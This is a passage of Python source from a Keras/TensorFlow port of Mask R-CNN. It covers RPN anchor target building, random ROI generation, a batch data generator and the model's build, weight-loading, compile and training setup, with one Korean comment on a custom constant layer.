rpn_match[(anchor_iou_max < 0.3) & (no_crowd_bool)] = -1
# 2. Set an anchor for each GT box (regardless of IoU value).
# If multiple anchors have the same IoU match all of them
gt_iou_argmax = np.argwhere(overlaps == np.max(overlaps, axis=0))[:,0]
rpn_match[gt_iou_argmax] = 1
# 3. Set anchors with high overlap as positive.
rpn_match[anchor_iou_max >= 0.7] = 1
# Subsample to balance positive and negative anchors
# Don't let positives be more than half the anchors
ids = np.where(rpn_match == 1)[0]
extra = len(ids) - (config.RPN_TRAIN_ANCHORS_PER_IMAGE // 2)
if extra > 0:
# Reset the extra ones to neutral
ids = np.random.choice(ids, extra, replace=False)
rpn_match[ids] = 0
# Same for negative proposals
ids = np.where(rpn_match == -1)[0]
extra = len(ids) - (config.RPN_TRAIN_ANCHORS_PER_IMAGE -
np.sum(rpn_match == 1))
if extra > 0:
# Rest the extra ones to neutral
ids = np.random.choice(ids, extra, replace=False)
rpn_match[ids] = 0
# For positive anchors, compute shift and scale needed to transform them
# to match the corresponding GT boxes.
ids = np.where(rpn_match == 1)[0]
ix = 0 # index into rpn_bbox
# TODO: use box_refinement() rather than duplicating the code here
for i, a in zip(ids, anchors[ids]):
# Closest gt box (it might have IoU < 0.7)
gt = gt_boxes[anchor_iou_argmax[i]]
# Convert coordinates to center plus width/height.
# GT Box
gt_h = gt[2] - gt[0]
gt_w = gt[3] - gt[1]
gt_center_y = gt[0] + 0.5 * gt_h
gt_center_x = gt[1] + 0.5 * gt_w
# Anchor
a_h = a[2] - a[0]
a_w = a[3] - a[1]
a_center_y = a[0] + 0.5 * a_h
a_center_x = a[1] + 0.5 * a_w
# Compute the bbox refinement that the RPN should predict.
rpn_bbox[ix] = [
(gt_center_y - a_center_y) / a_h,
(gt_center_x - a_center_x) / a_w,
np.log(gt_h / a_h),
np.log(gt_w / a_w),
]
# Normalize
rpn_bbox[ix] /= config.RPN_BBOX_STD_DEV
ix += 1
return rpn_match, rpn_bbox
def generate_random_rois(image_shape, count, gt_class_ids, gt_boxes):
"""Generates ROI proposals similar to what a region proposal network
would generate.
image_shape: [Height, Width, Depth]
count: Number of ROIs to generate
gt_class_ids: [N] Integer ground truth class IDs
gt_boxes: [N, (y1, x1, y2, x2)] Ground truth boxes in pixels.
Returns: [count, (y1, x1, y2, x2)] ROI boxes in pixels.
"""
# placeholder
rois = np.zeros((count, 4), dtype=np.int32)
# Generate random ROIs around GT boxes (90% of count)
rois_per_box = int(0.9 * count / gt_boxes.shape[0])
for i in range(gt_boxes.shape[0]):
gt_y1, gt_x1, gt_y2, gt_x2 = gt_boxes[i]
h = gt_y2 - gt_y1
w = gt_x2 - gt_x1
# random boundaries
r_y1 = max(gt_y1 - h, 0)
r_y2 = min(gt_y2 + h, image_shape[0])
r_x1 = max(gt_x1 - w, 0)
r_x2 = min(gt_x2 + w, image_shape[1])
# To avoid generating boxes with zero area, we generate double what
# we need and filter out the extra. If we get fewer valid boxes
# than we need, we loop and try again.
while True:
y1y2 = np.random.randint(r_y1, r_y2, (rois_per_box * 2, 2))
x1x2 = np.random.randint(r_x1, r_x2, (rois_per_box * 2, 2))
# Filter out zero area boxes
threshold = 1
y1y2 = y1y2[np.abs(y1y2[:, 0] - y1y2[:, 1]) >=
threshold][:rois_per_box]
x1x2 = x1x2[np.abs(x1x2[:, 0] - x1x2[:, 1]) >=
threshold][:rois_per_box]
if y1y2.shape[0] == rois_per_box and x1x2.shape[0] == rois_per_box:
break
# Sort on axis 1 to ensure x1 <= x2 and y1 <= y2 and then reshape
# into x1, y1, x2, y2 order
x1, x2 = np.split(np.sort(x1x2, axis=1), 2, axis=1)
y1, y2 = np.split(np.sort(y1y2, axis=1), 2, axis=1)
box_rois = np.hstack([y1, x1, y2, x2])
rois[rois_per_box * i:rois_per_box * (i + 1)] = box_rois
# Generate random ROIs anywhere in the image (10% of count)
remaining_count = count - (rois_per_box * gt_boxes.shape[0])
# To avoid generating boxes with zero area, we generate double what
# we need and filter out the extra. If we get fewer valid boxes
# than we need, we loop and try again.
while True:
y1y2 = np.random.randint(0, image_shape[0], (remaining_count * 2, 2))
x1x2 = np.random.randint(0, image_shape[1], (remaining_count * 2, 2))
# Filter out zero area boxes
threshold = 1
y1y2 = y1y2[np.abs(y1y2[:, 0] - y1y2[:, 1]) >=
threshold][:remaining_count]
x1x2 = x1x2[np.abs(x1x2[:, 0] - x1x2[:, 1]) >=
threshold][:remaining_count]
if y1y2.shape[0] == remaining_count and x1x2.shape[0] == remaining_count:
break
# Sort on axis 1 to ensure x1 <= x2 and y1 <= y2 and then reshape
# into x1, y1, x2, y2 order
x1, x2 = np.split(np.sort(x1x2, axis=1), 2, axis=1)
y1, y2 = np.split(np.sort(y1y2, axis=1), 2, axis=1)
global_rois = np.hstack([y1, x1, y2, x2])
rois[-remaining_count:] = global_rois
return rois
class DataGenerator(KU.Sequence):
"""An iterable that returns images and corresponding target class ids,
bounding box deltas, and masks. It inherits from keras.utils.Sequence to avoid data redundancy
when multiprocessing=True.
dataset: The Dataset object to pick data from
config: The model config object
shuffle: If True, shuffles the samples before every epoch
augmentation: Optional. An imgaug (https://github.com/aleju/imgaug) augmentation.
For example, passing imgaug.augmenters.Fliplr(0.5) flips images
right/left 50% of the time.
random_rois: If > 0 then generate proposals to be used to train the
network classifier and mask heads. Useful if training
the Mask RCNN part without the RPN.
detection_targets: If True, generate detection targets (class IDs, bbox
deltas, and masks). Typically for debugging or visualizations because
in trainig detection targets are generated by DetectionTargetLayer.
Returns a Python iterable. Upon calling __getitem__() on it, the
iterable returns two lists, inputs and outputs. The contents
of the lists differ depending on the received arguments:
inputs list:
- images: [batch, H, W, C]
- image_meta: [batch, (meta data)] Image details. See compose_image_meta()
- rpn_match: [batch, N] Integer (1=positive anchor, -1=negative, 0=neutral)
- rpn_bbox: [batch, N, (dy, dx, log(dh), log(dw))] Anchor bbox deltas.
- gt_class_ids: [batch, MAX_GT_INSTANCES] Integer class IDs
- gt_boxes: [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)]
- gt_masks: [batch, height, width, MAX_GT_INSTANCES]. The height and width
are those of the image unless use_mini_mask is True, in which
case they are defined in MINI_MASK_SHAPE.
outputs list: Usually empty in regular training. But if detection_targets
is True then the outputs list contains target class_ids, bbox deltas,
and masks.
"""
def __init__(self, dataset, config, shuffle=True, augmentation=None,
random_rois=0, detection_targets=False):
self.image_ids = np.copy(dataset.image_ids)
self.dataset = dataset
self.config = config
# Anchors
# [anchor_count, (y1, x1, y2, x2)]
self.backbone_shapes = compute_backbone_shapes(config, config.IMAGE_SHAPE)
self.anchors = utils.generate_pyramid_anchors(config.RPN_ANCHOR_SCALES,
config.RPN_ANCHOR_RATIOS,
self.backbone_shapes,
config.BACKBONE_STRIDES,
config.RPN_ANCHOR_STRIDE)
self.shuffle = shuffle
self.augmentation = augmentation
self.random_rois = random_rois
self.batch_size = self.config.BATCH_SIZE
self.detection_targets = detection_targets
def __len__(self):
return int(np.ceil(len(self.image_ids) / float(self.batch_size)))
def __getitem__(self, idx):
b = 0
image_index = -1
while b < self.batch_size:
# Increment index to pick next image. Shuffle if at the start of an epoch.
image_index = (image_index + 1) % len(self.image_ids)
if self.shuffle and image_index == 0:
np.random.shuffle(self.image_ids)
# Get GT bounding boxes and masks for image.
image_id = self.image_ids[image_index]
image, image_meta, gt_class_ids, gt_boxes, gt_masks = \
load_image_gt(self.dataset, self.config, image_id,
augmentation=self.augmentation)
# Skip images that have no instances. This can happen in cases
# where we train on a subset of classes and the image doesn't
# have any of the classes we care about.
if not np.any(gt_class_ids > 0):
continue
# RPN Targets
rpn_match, rpn_bbox = build_rpn_targets(image.shape, self.anchors,
gt_class_ids, gt_boxes, self.config)
# Mask R-CNN Targets
if self.random_rois:
rpn_rois = generate_random_rois(
image.shape, self.random_rois, gt_class_ids, gt_boxes)
if self.detection_targets:
rois, mrcnn_class_ids, mrcnn_bbox, mrcnn_mask = \
build_detection_targets(
rpn_rois, gt_class_ids, gt_boxes, gt_masks, self.config)
# Init batch arrays
if b == 0:
batch_image_meta = np.zeros(
(self.batch_size,) + image_meta.shape, dtype=image_meta.dtype)
batch_rpn_match = np.zeros(
[self.batch_size, self.anchors.shape[0], 1], dtype=rpn_match.dtype)
batch_rpn_bbox = np.zeros(
[self.batch_size, self.config.RPN_TRAIN_ANCHORS_PER_IMAGE, 4], dtype=rpn_bbox.dtype)
batch_images = np.zeros(
(self.batch_size,) + image.shape, dtype=np.float32)
batch_gt_class_ids = np.zeros(
(self.batch_size, self.config.MAX_GT_INSTANCES), dtype=np.int32)
batch_gt_boxes = np.zeros(
(self.batch_size, self.config.MAX_GT_INSTANCES, 4), dtype=np.int32)
batch_gt_masks = np.zeros(
(self.batch_size, gt_masks.shape[0], gt_masks.shape[1],
self.config.MAX_GT_INSTANCES), dtype=gt_masks.dtype)
if self.random_rois:
batch_rpn_rois = np.zeros(
(self.batch_size, rpn_rois.shape[0], 4), dtype=rpn_rois.dtype)
if self.detection_targets:
batch_rois = np.zeros(
(self.batch_size,) + rois.shape, dtype=rois.dtype)
batch_mrcnn_class_ids = np.zeros(
(self.batch_size,) + mrcnn_class_ids.shape, dtype=mrcnn_class_ids.dtype)
batch_mrcnn_bbox = np.zeros(
(self.batch_size,) + mrcnn_bbox.shape, dtype=mrcnn_bbox.dtype)
batch_mrcnn_mask = np.zeros(
(self.batch_size,) + mrcnn_mask.shape, dtype=mrcnn_mask.dtype)
# If more instances than fits in the array, sub-sample from them.
if gt_boxes.shape[0] > self.config.MAX_GT_INSTANCES:
ids = np.random.choice(
np.arange(gt_boxes.shape[0]), self.config.MAX_GT_INSTANCES, replace=False)
gt_class_ids = gt_class_ids[ids]
gt_boxes = gt_boxes[ids]
gt_masks = gt_masks[:, :, ids]
# Add to batch
batch_image_meta[b] = image_meta
batch_rpn_match[b] = rpn_match[:, np.newaxis]
batch_rpn_bbox[b] = rpn_bbox
batch_images[b] = mold_image(image.astype(np.float32), self.config)
batch_gt_class_ids[b, :gt_class_ids.shape[0]] = gt_class_ids
batch_gt_boxes[b, :gt_boxes.shape[0]] = gt_boxes
batch_gt_masks[b, :, :, :gt_masks.shape[-1]] = gt_masks
if self.random_rois:
batch_rpn_rois[b] = rpn_rois
if self.detection_targets:
batch_rois[b] = rois
batch_mrcnn_class_ids[b] = mrcnn_class_ids
batch_mrcnn_bbox[b] = mrcnn_bbox
batch_mrcnn_mask[b] = mrcnn_mask
b += 1
inputs = [batch_images, batch_image_meta, batch_rpn_match, batch_rpn_bbox,
batch_gt_class_ids, batch_gt_boxes, batch_gt_masks]
outputs = []
if self.random_rois:
inputs.extend([batch_rpn_rois])
if self.detection_targets:
inputs.extend([batch_rois])
# Keras requires that output and targets have the same number of dimensions
batch_mrcnn_class_ids = np.expand_dims(
batch_mrcnn_class_ids, -1)
outputs.extend(
[batch_mrcnn_class_ids, batch_mrcnn_bbox, batch_mrcnn_mask])
return inputs, outputs
############################################################
# MaskRCNN Class
############################################################
class MaskRCNN(object):
"""Encapsulates the Mask RCNN model functionality.
The actual Keras model is in the keras_model property.
"""
def __init__(self, mode, config, model_dir):
"""
mode: Either "training" or "inference"
config: A Sub-class of the Config class
model_dir: Directory to save training logs and trained weights
"""
assert mode in ['training', 'inference']
self.mode = mode
self.config = config
self.model_dir = model_dir
self.set_log_dir()
self.keras_model = self.build(mode=mode, config=config)
def build(self, mode, config):
"""Build Mask R-CNN architecture.
input_shape: The shape of the input image.
mode: Either "training" or "inference". The inputs and
outputs of the model differ accordingly.
"""
assert mode in ['training', 'inference']
# Image size must be dividable by 2 multiple times
h, w = config.IMAGE_SHAPE[:2]
if h / 2**6 != int(h / 2**6) or w / 2**6 != int(w / 2**6):
raise Exception("Image size must be dividable by 2 at least 6 times "
"to avoid fractions when downscaling and upscaling."
"For example, use 256, 320, 384, 448, 512, ... etc. ")
# Inputs
input_image = KL.Input(
shape=[None, None, config.IMAGE_SHAPE[2]], name="input_image")
input_image_meta = KL.Input(shape=[config.IMAGE_META_SIZE],
name="input_image_meta")
if mode == "training":
# RPN GT
input_rpn_match = KL.Input(
shape=[None, 1], name="input_rpn_match", dtype=tf.int32)
input_rpn_bbox = KL.Input(
shape=[None, 4], name="input_rpn_bbox", dtype=tf.float32)
# Detection GT (class IDs, bounding boxes, and masks)
# 1. GT Class IDs (zero padded)
input_gt_class_ids = KL.Input(
shape=[None], name="input_gt_class_ids", dtype=tf.int32)
# 2. GT Boxes in pixels (zero padded)
# [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)] in image coordinates
input_gt_boxes = KL.Input(
shape=[None, 4], name="input_gt_boxes", dtype=tf.float32)
# Normalize coordinates
gt_boxes = KL.Lambda(lambda x: norm_boxes_graph(
x, K.shape(input_image)[1:3]))(input_gt_boxes)
# 3. GT Masks (zero padded)
# [batch, height, width, MAX_GT_INSTANCES]
if config.USE_MINI_MASK:
input_gt_masks = KL.Input(
shape=[config.MINI_MASK_SHAPE[0],
config.MINI_MASK_SHAPE[1], None],
name="input_gt_masks", dtype=bool)
else:
input_gt_masks = KL.Input(
shape=[config.IMAGE_SHAPE[0], config.IMAGE_SHAPE[1], None],
name="input_gt_masks", dtype=bool)
elif mode == "inference":
# Anchors in normalized coordinates
input_anchors = KL.Input(shape=[None, 4], name="input_anchors")
# Build the shared convolutional layers.
# Bottom-up Layers
# Returns a list of the last layers of each stage, 5 in total.
# Don't create the thead (stage 5), so we pick the 4th item in the list.
if callable(config.BACKBONE):
_, C2, C3, C4, C5 = config.BACKBONE(input_image, stage5=True,
train_bn=config.TRAIN_BN)
else:
_, C2, C3, C4, C5 = resnet_graph(input_image, config.BACKBONE,
stage5=True, train_bn=config.TRAIN_BN)
# Top-down Layers
# TODO: add assert to varify feature map sizes match what's in config
P5 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c5p5')(C5)
P4 = KL.Add(name="fpn_p4add")([
KL.UpSampling2D(size=(2, 2), name="fpn_p5upsampled")(P5),
KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c4p4')(C4)])
P3 = KL.Add(name="fpn_p3add")([
KL.UpSampling2D(size=(2, 2), name="fpn_p4upsampled")(P4),
KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c3p3')(C3)])
P2 = KL.Add(name="fpn_p2add")([
KL.UpSampling2D(size=(2, 2), name="fpn_p3upsampled")(P3),
KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c2p2')(C2)])
# Attach 3x3 conv to all P layers to get the final feature maps.
P2 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p2")(P2)
P3 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p3")(P3)
P4 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p4")(P4)
P5 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p5")(P5)
# P6 is used for the 5th anchor scale in RPN. Generated by
# subsampling from P5 with stride of 2.
P6 = KL.MaxPooling2D(pool_size=(1, 1), strides=2, name="fpn_p6")(P5)
# Note that P6 is used in RPN, but not in the classifier heads.
rpn_feature_maps = [P2, P3, P4, P5, P6]
mrcnn_feature_maps = [P2, P3, P4, P5]
# Anchors
if mode == "training":
anchors = self.get_anchors(config.IMAGE_SHAPE)
# Duplicate across the batch dimension because Keras requires it
# TODO: can this be optimized to avoid duplicating the anchors?
anchors = np.broadcast_to(anchors, (config.BATCH_SIZE,) + anchors.shape)
# A hack to get around Keras's bad support for constants
# 원본 tf1 버전 코드
# anchors = tf.keras.layers.Lambda(lambda x: tf.Variable(anchors), name="anchors")(input_image)
"""케라스에서 상수 레이어에 해당하는 레이어가 없어서 람다 레이어를 사용하는 편법이 있었는데
이제 통하지 않는다!
그건 그렇고 인풋 함수가 있는데 왜 저렇게 짠거지??? 아무튼 커스텀 레이어 작성해서 상수 텐서를 리턴해주기로 함.
"""
class ConstLayer(tf.keras.layers.Layer):
def __init__(self, x, name=None):
super(ConstLayer, self).__init__(name=name)
self.x = tf.Variable(x)
def call(self, input):
return self.x
anchors = ConstLayer(anchors, name="anchors")(input_image)
else:
anchors = input_anchors
# RPN Model
rpn = build_rpn_model(config.RPN_ANCHOR_STRIDE,
len(config.RPN_ANCHOR_RATIOS), config.TOP_DOWN_PYRAMID_SIZE)
# Loop through pyramid layers
layer_outputs = [] # list of lists
for p in rpn_feature_maps:
layer_outputs.append(rpn([p]))
# Concatenate layer outputs
# Convert from list of lists of level outputs to list of lists
# of outputs across levels.
# e.g. [[a1, b1, c1], [a2, b2, c2]] => [[a1, a2], [b1, b2], [c1, c2]]
output_names = ["rpn_class_logits", "rpn_class", "rpn_bbox"]
outputs = list(zip(*layer_outputs))
outputs = [KL.Concatenate(axis=1, name=n)(list(o))
for o, n in zip(outputs, output_names)]
rpn_class_logits, rpn_class, rpn_bbox = outputs
# Generate proposals
# Proposals are [batch, N, (y1, x1, y2, x2)] in normalized coordinates
# and zero padded.
proposal_count = config.POST_NMS_ROIS_TRAINING if mode == "training"\
else config.POST_NMS_ROIS_INFERENCE
rpn_rois = ProposalLayer(
proposal_count=proposal_count,
nms_threshold=config.RPN_NMS_THRESHOLD,
name="ROI",
config=config)([rpn_class, rpn_bbox, anchors])
if mode == "training":
# Class ID mask to mark class IDs supported by the dataset the image
# came from.
active_class_ids = KL.Lambda(
lambda x: parse_image_meta_graph(x)["active_class_ids"]
)(input_image_meta)
if not config.USE_RPN_ROIS:
# Ignore predicted ROIs and use ROIs provided as an input.
input_rois = KL.Input(shape=[config.POST_NMS_ROIS_TRAINING, 4],
name="input_roi", dtype=np.int32)
# Normalize coordinates
target_rois = KL.Lambda(lambda x: norm_boxes_graph(
x, K.shape(input_image)[1:3]))(input_rois)
else:
target_rois = rpn_rois
# Generate detection targets
# Subsamples proposals and generates target outputs for training
# Note that proposal class IDs, gt_boxes, and gt_masks are zero
# padded. Equally, returned rois and targets are zero padded.
rois, target_class_ids, target_bbox, target_mask =\
DetectionTargetLayer(config, name="proposal_targets")([
target_rois, input_gt_class_ids, gt_boxes, input_gt_masks])
# Network Heads
# TODO: verify that this handles zero padded ROIs
mrcnn_class_logits, mrcnn_class, mrcnn_bbox =\
fpn_classifier_graph(rois, mrcnn_feature_maps, input_image_meta,
config.POOL_SIZE, config.NUM_CLASSES,
train_bn=config.TRAIN_BN,
fc_layers_size=config.FPN_CLASSIF_FC_LAYERS_SIZE)
mrcnn_mask = build_fpn_mask_graph(rois, mrcnn_feature_maps,
input_image_meta,
config.MASK_POOL_SIZE,
config.NUM_CLASSES,
train_bn=config.TRAIN_BN)
# TODO: clean up (use tf.identify if necessary)
output_rois = KL.Lambda(lambda x: x * 1, name="output_rois")(rois)
# Losses
rpn_class_loss = KL.Lambda(lambda x: rpn_class_loss_graph(*x), name="rpn_class_loss")(
[input_rpn_match, rpn_class_logits])
rpn_bbox_loss = KL.Lambda(lambda x: rpn_bbox_loss_graph(config, *x), name="rpn_bbox_loss")(
[input_rpn_bbox, input_rpn_match, rpn_bbox])
class_loss = KL.Lambda(lambda x: mrcnn_class_loss_graph(*x), name="mrcnn_class_loss")(
[target_class_ids, mrcnn_class_logits, active_class_ids])
bbox_loss = KL.Lambda(lambda x: mrcnn_bbox_loss_graph(*x), name="mrcnn_bbox_loss")(
[target_bbox, target_class_ids, mrcnn_bbox])
mask_loss = KL.Lambda(lambda x: mrcnn_mask_loss_graph(*x), name="mrcnn_mask_loss")(
[target_mask, target_class_ids, mrcnn_mask])
# Model
inputs = [input_image, input_image_meta,
input_rpn_match, input_rpn_bbox, input_gt_class_ids, input_gt_boxes, input_gt_masks]
if not config.USE_RPN_ROIS:
inputs.append(input_rois)
outputs = [rpn_class_logits, rpn_class, rpn_bbox,
mrcnn_class_logits, mrcnn_class, mrcnn_bbox, mrcnn_mask,
rpn_rois, output_rois,
rpn_class_loss, rpn_bbox_loss, class_loss, bbox_loss, mask_loss]
model = KM.Model(inputs, outputs, name='mask_rcnn')
else:
# Network Heads
# Proposal classifier and BBox regressor heads
mrcnn_class_logits, mrcnn_class, mrcnn_bbox =\
fpn_classifier_graph(rpn_rois, mrcnn_feature_maps, input_image_meta,
config.POOL_SIZE, config.NUM_CLASSES,
train_bn=config.TRAIN_BN,
fc_layers_size=config.FPN_CLASSIF_FC_LAYERS_SIZE)
# Detections
# output is [batch, num_detections, (y1, x1, y2, x2, class_id, score)] in
# normalized coordinates
detections = DetectionLayer(config, name="mrcnn_detection")(
[rpn_rois, mrcnn_class, mrcnn_bbox, input_image_meta])
# Create masks for detections
detection_boxes = KL.Lambda(lambda x: x[..., :4])(detections)
mrcnn_mask = build_fpn_mask_graph(detection_boxes, mrcnn_feature_maps,
input_image_meta,
config.MASK_POOL_SIZE,
config.NUM_CLASSES,
train_bn=config.TRAIN_BN)
model = KM.Model([input_image, input_image_meta, input_anchors],
[detections, mrcnn_class, mrcnn_bbox,
mrcnn_mask, rpn_rois, rpn_class, rpn_bbox],
name='mask_rcnn')
# Add multi-GPU support.
if config.GPU_COUNT > 1:
from mrcnn.parallel_model import ParallelModel
model = ParallelModel(model, config.GPU_COUNT)
return model
def find_last(self):
"""Finds the last checkpoint file of the last trained model in the
model directory.
Returns:
The path of the last checkpoint file
"""
# Get directory names. Each directory corresponds to a model
dir_names = next(os.walk(self.model_dir))[1]
key = self.config.NAME.lower()
dir_names = filter(lambda f: f.startswith(key), dir_names)
dir_names = sorted(dir_names)
if not dir_names:
import errno
raise FileNotFoundError(
errno.ENOENT,
"Could not find model directory under {}".format(self.model_dir))
# Pick last directory
dir_name = os.path.join(self.model_dir, dir_names[-1])
# Find the last checkpoint
checkpoints = next(os.walk(dir_name))[2]
checkpoints = filter(lambda f: f.startswith("mask_rcnn"), checkpoints)
checkpoints = sorted(checkpoints)
if not checkpoints:
import errno
raise FileNotFoundError(
errno.ENOENT, "Could not find weight files in {}".format(dir_name))
checkpoint = os.path.join(dir_name, checkpoints[-1])
return checkpoint
def load_weights(self, filepath, by_name=False, exclude=None):
"""Modified version of the corresponding Keras function with
the addition of multi-GPU support and the ability to exclude
some layers from loading.
exclude: list of layer names to exclude
"""
import h5py
from tensorflow.python.keras.saving import hdf5_format
if exclude:
by_name = True
if h5py is None:
raise ImportError('`load_weights` requires h5py.')
with h5py.File(filepath, mode='r') as f:
if 'layer_names' not in f.attrs and 'model_weights' in f:
f = f['model_weights']
# In multi-GPU training, we wrap the model. Get layers
# of the inner model because they have the weights.
keras_model = self.keras_model
layers = keras_model.inner_model.layers if hasattr(keras_model, "inner_model")\
else keras_model.layers
# Exclude some layers
if exclude:
layers = filter(lambda l: l.name not in exclude, layers)
if by_name:
hdf5_format.load_weights_from_hdf5_group_by_name(f, layers)
else:
hdf5_format.load_weights_from_hdf5_group(f, layers)
# Update the log directory
self.set_log_dir(filepath)
def get_imagenet_weights(self):
"""Downloads ImageNet trained weights from Keras.
Returns path to weights file.
"""
from keras.utils.data_utils import get_file
TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/'\
'releases/download/v0.2/'\
'resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5'
weights_path = get_file('resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5',
TF_WEIGHTS_PATH_NO_TOP,
cache_subdir='models',
md5_hash='a268eb855778b3df3c7506639542a6af')
return weights_path
def compile(self, learning_rate, momentum):
"""Gets the model ready for training. Adds losses, regularization, and
metrics. Then calls the Keras compile() function.
"""
# Optimizer object
optimizer = keras.optimizers.SGD(
lr=learning_rate, momentum=momentum,
clipnorm=self.config.GRADIENT_CLIP_NORM)
# Add Losses
loss_names = [
"rpn_class_loss", "rpn_bbox_loss",
"mrcnn_class_loss", "mrcnn_bbox_loss", "mrcnn_mask_loss"]
for name in loss_names:
layer = self.keras_model.get_layer(name)
if layer.output in self.keras_model.losses:
continue
loss = (
tf.reduce_mean(input_tensor=layer.output, keepdims=True)
* self.config.LOSS_WEIGHTS.get(name, 1.))
self.keras_model.add_loss(loss)
# Add L2 Regularization
# Skip gamma and beta weights of batch normalization layers.
reg_losses = [
keras.regularizers.l2(self.config.WEIGHT_DECAY)(w) / tf.cast(tf.size(input=w), tf.float32)
for w in self.keras_model.trainable_weights
if 'gamma' not in w.name and 'beta' not in w.name]
self.keras_model.add_loss(tf.add_n(reg_losses))
# Compile
self.keras_model.compile(
optimizer=optimizer,
loss=[None] * len(self.keras_model.outputs))
# Add metrics for losses
for name in loss_names:
if name in self.keras_model.metrics_names:
continue
layer = self.keras_model.get_layer(name)
self.keras_model.metrics_names.append(name)
loss = (
tf.reduce_mean(input_tensor=layer.output, keepdims=True)
* self.config.LOSS_WEIGHTS.get(name, 1.))
self.keras_model.add_metric(loss, name=name, aggregation='mean')
def set_trainable(self, layer_regex, keras_model=None, indent=0, verbose=1):
"""Sets model layers as trainable if their names match
the given regular expression.
"""
# Print message on the first call (but not on recursive calls)
if verbose > 0 and keras_model is None:
log("Selecting layers to train")
keras_model = keras_model or self.keras_model
# In multi-GPU training, we wrap the model. Get layers
# of the inner model because they have the weights.
layers = keras_model.inner_model.layers if hasattr(keras_model, "inner_model")\
else keras_model.layers
for layer in layers:
# Is the layer a model?
if layer.__class__.__name__ == 'Model':
print("In model: ", layer.name)
self.set_trainable(
layer_regex, keras_model=layer, indent=indent + 4)
continue
if not layer.weights:
continue
# Is it trainable?
trainable = bool(re.fullmatch(layer_regex, layer.name))
# Update layer. If layer is a container, update inner layer.
if layer.__class__.__name__ == 'TimeDistributed':
layer.layer.trainable = trainable
else:
layer.trainable = trainable
# Print trainable layer names
if trainable and verbose > 0:
log("{}{:20} ({})".format(" " * indent, layer.name,
layer.__class__.__name__))
def set_log_dir(self, model_path=None):
"""Sets the model log directory and epoch counter.
model_path: If None, or a format different from what this code uses
then set a new log directory and start epochs from 0. Otherwise,
extract the log directory and the epoch counter from the file
name.
"""
# Set date and epoch counter as if starting a new model
self.epoch = 0
now = datetime.datetime.now()
# If we have a model path with date and epochs use them
if model_path:
# Continue from we left of. Get epoch and date from the file name
# A sample model path might look like:
# \path\to\logs\coco20171029T2315\mask_rcnn_coco_0001.h5 (Windows)
# /path/to/logs/coco20171029T2315/mask_rcnn_coco_0001.h5 (Linux)
regex = r".*[/\\][\w-]+(\d{4})(\d{2})(\d{2})T(\d{2})(\d{2})[/\\]mask\_rcnn\_[\w-]+(\d{4})\.h5"
# Use string for regex since we might want to use pathlib.Path as model_path
m = re.match(regex, str(model_path))
if m:
now = datetime.datetime(int(m.group(1)), int(m.group(2)), int(m.group(3)),
int(m.group(4)), int(m.group(5)))
# Epoch number in file is 1-based, and in Keras code it's 0-based.
# So, adjust for that then increment by one to start from the next epoch
self.epoch = int(m.group(6)) - 1 + 1
print('Re-starting from epoch %d' % self.epoch)
# Directory for training logs
self.log_dir = os.path.join(self.model_dir, "{}{:%Y%m%dT%H%M}".format(
self.config.NAME.lower(), now))
# Path to save after each epoch. Include placeholders that get filled by Keras.
self.checkpoint_path = os.path.join(self.log_dir, "mask_rcnn_{}_*epoch*.h5".format(
self.config.NAME.lower()))
self.checkpoint_path = self.checkpoint_path.replace(
"*epoch*", "{epoch:04d}")
def train(self, train_dataset, val_dataset, learning_rate, epochs, layers,
augmentation=None, custom_callbacks=None, no_augmentation_sources=None):
"""Train the model.
train_dataset, val_dataset: Training and validation Dataset objects.
learning_rate: The learning rate to train with
epochs: Number of training epochs. Note that previous training epochs
are considered to be done alreay, so this actually determines
the epochs to train in total rather than in this particaular
call.
layers: Allows selecting wich layers to train. It can be:
- A regular expression to match layer names to train
- One of these predefined values:
heads: The RPN, classifier and mask heads of the network
all: All the layers
3+: Train Resnet stage 3 and up
4+: Train Resnet stage 4 and up
5+: Train Resnet stage 5 and up
augmentation: Optional. An imgaug (https://github.com/aleju/imgaug)
augmentation. For example, passing imgaug.augmenters.Fliplr(0.5)
flips images right/left 50% of the time. You can pass complex
augmentations as well. This augmentation applies 50% of the
time, and when it does it flips images right/left half the time
and adds a Gaussian blur with a random sigma in range 0 to 5.
augmentation = imgaug.augmenters.Sometimes(0.5, [
imgaug.augmenters.Fliplr(0.5),
imgaug.augmenters.GaussianBlur(sigma=(0.0, 5.0))
])
custom_callbacks: Optional. Add custom callbacks to be called
with the keras fit_generator method. Must be list of type keras.callbacks.
no_augmentation_sources: Optional. List of sources to exclude for
augmentation. A source is string that identifies a dataset and is
defined in the Dataset class.
"""
assert self.mode == "training", "Create model in training mode."
# Pre-defined layer regular expressions
layer_regex = {
# all layers but the backbone
"heads": r"(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)",
# From a specific Resnet stage and up
"3+": r"(res3.*)|(bn3.*)|(res4.*)|(bn4.*)|(res5.*)|(bn5.*)|(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)",
"4+": r"(res4.*)|(bn4.*)|(res5.*)|(bn5.*)|(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)",
"5+": r"(res5.*)|(bn5.*)|(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)",
# All layers
"all": ".*",
}
if layers in layer_regex.keys():
layers = layer_regex[layers]
# Data generators
train_generator = DataGenerator(train_dataset, self.config, shuffle=True,
augmentation=augmentation)
val_generator = DataGenerator(val_dataset, self.config, shuffle=True)
# Create log_dir if it does not exist
if not os.path.exists(self.log_dir):
os.makedirs(self.log_dir)
# Callbacks
callbacks = [
#keras.callbacks.TensorBoard(log_dir=self.log_dir,
# histogram_freq=0, write_graph=True, write_images=False),
